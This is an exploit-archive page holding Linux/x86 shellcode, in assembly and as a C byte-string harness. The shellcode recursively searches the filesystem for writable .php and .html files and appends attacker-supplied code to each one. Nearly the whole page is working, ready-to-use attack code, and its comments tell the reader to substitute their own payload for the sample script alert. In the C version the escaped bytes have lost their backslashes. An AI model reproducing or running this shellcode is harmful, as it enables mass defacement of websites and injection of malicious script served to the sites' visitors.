[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86 Search For php,html Writable Files and Add Your Code
# Published : 2012-01-17
# Author :
# Previous Title : Shellcode Checksum Routine
# Next Title : Linux x86_64 - add user with passwd (189 bytes)
; Title : Linux/x86 Search php,html writable files and add your code.
; Date : 2011-10-24
; Author: rigan - imrigan [sobachka ] gmail.com
; Size : 380 bytes + your code.
;
; Note : This shellcode writes down your code in the end of
; found files. Your code will be added only .html and .php
; files. Search for files is carried out recursively.
BITS 32
section .text
global _start
_start:
;======================================================================;
; main ;
;======================================================================;
; chdir("/")
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2f
mov ebx, esp
mov al, 12
int 0x80
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2e
jmp SHORT .exit
.jmp_search:
jmp SHORT search
.exit:
call .jmp_search
; exit(0)
xor eax, eax
xor ebx, ebx
mov al, 1
int 0x80
;======================================================================;
; inject ;
;======================================================================;
inject:
; open("file", O_WRONLY)
xor eax, eax
mov ebx, edi
xor ecx, ecx
mov cl, 2
mov al, 5
int 0x80
; lseek(fd, 0, SEEK_END)
xor ebx, ebx
mov ebx, eax
xor ecx, ecx
xor eax, eax
cdq
mov dl, 2
mov al, 19
int 0x80
; write(fd, your_code, sizeof(your_code))
xor eax, eax
mov ecx, esi
mov dl, 43 ; <- TO CHANGE THE SIZE HERE.
mov al, 4
int 0x80
; close(fd)
xor eax, eax
xor ebx, ebx
mov al, 6
int 0x80
ret
;======================================================================;
; substr ;
;======================================================================;
substr:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
cdq
loop_1:
inc edx
; edi contains the filename address
; esi contains the substring address
mov BYTE bl, [edi + edx]
test bl, bl
jz not_found
cmp BYTE bl, [esi]
jne loop_1
loop_2:
mov BYTE al, [esi + ecx]
mov BYTE bl, [edi + edx]
test al, al
jz found
inc ecx
inc edx
cmp bl, al
je loop_2
jmp short not_found
found:
xor eax, eax
mov al, 2
not_found:
ret
;======================================================================;
; search ;
;======================================================================;
;This function recursively find all writable files. [php, html]
search:
push ebp
mov ebp, esp
mov al, 250
sub esp, eax
; open(".", O_WRONLY)
xor eax, eax
xor ecx, ecx
lea ebx, [ebp + 8]
mov al, 5
int 0x80
test eax, eax
js .old_dirent
mov [ebp + 12], eax
.while:
; readdir(fd, struct old_linux_dirent *dirp, NULL)
mov esi, [ebp + 12]
mov ebx, esi
xor eax, eax
xor ecx, ecx
lea ecx, [esp + 100]
mov al, 89
int 0x80
test eax, eax
jnz .l1
; closedir(fd)
xor eax, eax
xor ebx, ebx
mov ebx, esi
mov al, 6
int 0x80
.old_dirent:
; chdir("..")
xor eax, eax
push eax
push WORD 0x2e2e
mov ebx, esp
mov al, 12
int 0x80
leave
ret
.l1:
lea edx, [esp + 110]
cmp DWORD [edx], 0x636f7270 ; If the /proc filesystem detected...
je .while ; ...next dir
cmp BYTE [edx], 0x2e
jne .l2
jmp .while
.l2:
; lstat(const char *file, struct stat *buf)
mov ebx, edx
mov ecx, esp
xor eax, eax
mov al, 196
int 0x80
mov cx, 61439
mov bx, 40959
inc ecx
inc ebx
mov eax, [esp + 16]
and ax, cx
cmp ax, bx
jne .l3
jmp .while
.l3:
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2e
; chdir("file")
mov ebx, edx
mov al, 12
int 0x80
test eax, eax
jne .l4
call search
jmp .while
.l4:
; access("file", W_OK)
xor eax, eax
mov ebx, edx
xor ecx, ecx
mov cl, 2
mov al, 33
int 0x80
test eax, eax
jz .check_html
jmp .while
;======================================================================;
; check_html ;
;======================================================================;
.check_html:
xor eax, eax
push eax
push DWORD 0x6c6d7468 ;
sub esp, BYTE 0x1 ; .html
mov BYTE [esp], 0x2e ;
mov esi, esp
mov edi, edx
call substr
cmp BYTE al, 2
je .do_inject
;======================================================================;
; check_php ;
;======================================================================;
.check_php:
xor eax, eax
push eax
push DWORD 0x7068702e ; .php
mov esi, esp
call substr
cmp BYTE al, 2
je .do_inject
jmp .while
;======================================================================;
; do_inject ;
;======================================================================;
.do_inject:
jmp SHORT .your_code
.write:
pop esi ; Get the address of your code into esi
call inject
jmp .while
;======================================================================;
; your_code ;
;======================================================================;
.your_code:
call .write
; Here a place for your code. Its size should be allocated in the
; register dl. Look at the "inject" function.
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it.
; Dont't forget to change the size of your code!
------------------------------------------------------------------------
Below is presented the shellcode equivalent.
#include <stdio.h>
char shellcode[] =
"x31xc0x50x83xecx01xc6x04x24x2fx89xe3xb0x0cxcdx80"
"x31xc0x50x83xecx01xc6x04x24x2exebx02xebx63xe8xf9"
"xffxffxffx31xc0x31xdbxb0x01xcdx80x31xc0x89xfbx31"
"xc9xb1x02xb0x05xcdx80x31xdbx89xc3x31xc9x31xc0x99"
"xb2x02xb0x13xcdx80x31xc0x89xf1xb2x2bxb0x04xcdx80"
"x31xc0xb0x06xcdx80xc3x31xc0x31xdbx31xc9x99x42x8a"
"x1cx17x84xdbx74x1ax3ax1ex75xf4x8ax04x0ex8ax1cx17"
"x84xc0x74x08x41x42x38xc3x74xf0xebx04x31xc0xb0x02"
"xc3x55x89xe5xb0xfax29xc4x31xc0x31xc9x8dx5dx08xb0"
"x05xcdx80x85xc0x78x22x89x45x0cx8bx75x0cx89xf3x31"
"xc0x31xc9x8dx4cx24x64xb0x59xcdx80x85xc0x75x19x31"
"xc0x31xdbx89xf3xb0x06xcdx80x31xc0x50x66x68x2ex2e"
"x89xe3xb0x0cxcdx80xc9xc3x8dx54x24x6ex81x3ax70x72"
"x6fx63x74xc6x80x3ax2ex75x05xe9xbcxffxffxffx89xd3"
"x89xe1x31xc0xb0xc4xcdx80x66xb9xffxefx66xbbxffx9f"
"x41x43x8bx44x24x10x66x21xc8x66x39xd8x75x05xe9x97"
"xffxffxffx31xc0x50x83xecx01xc6x04x24x2ex89xd3xb0"
"x0cxcdx80x85xc0x75x0axe8x65xffxffxffxe9x79xffxff"
"xffx31xc0x89xd3x31xc9xb1x02xb0x21xcdx80x85xc0x74"
"x05xe9x64xffxffxffx31xc0x50x68x68x74x6dx6cx83xec"
"x01xc6x04x24x2ex89xe6x89xd7xe8x09xffxffxffx3cx02"
"x74x18x31xc0x50x68x2ex70x68x70x89xe6xe8xf6xfexff"
"xffx3cx02x74x05xe9x30xffxffxffxebx0bx5exe8xb9xfe"
"xffxffxe9x23xffxffxffxe8xf0xffxffxff"
// <html><script>alert("pwn3d")<script></html>
"x3cx68x74x6dx6cx3ex3cx73x63x72x69x70x74x3ex61x6c"
"x65x72x74x28x22x70x77x6ex33x64x22x29x3cx73x63x72"
"x69x70x74x3ex3cx2fx68x74x6dx6cx3e";
int main()
{
printf("%dn", strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}